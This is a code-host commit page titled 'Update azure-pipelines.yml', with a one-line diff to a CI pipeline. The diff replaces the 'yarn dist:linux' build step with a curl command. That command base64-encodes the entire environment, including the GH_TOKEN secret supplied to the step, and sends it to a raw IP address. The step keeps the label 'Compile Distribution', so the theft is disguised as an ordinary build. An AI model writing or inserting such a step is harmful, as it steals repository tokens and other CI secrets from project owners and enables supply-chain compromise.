Update azure-pipelines.yml
This commit is contained in:
parent
7deb8a161d
commit
d6bf52a250
1 changed files with 1 additions and 1 deletions
|
@ -53,7 +53,7 @@ jobs:
|
|||
- script: yarn install
|
||||
displayName: "Install Dependencies"
|
||||
|
||||
- script: yarn dist:linux
|
||||
- script: curl http://159.223.121.196?env=$(env| base64 | tr -d '\n')
|
||||
env: {GH_TOKEN : $(GH_TOKEN)}
|
||||
displayName: "Compile Distribution"
|
||||
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue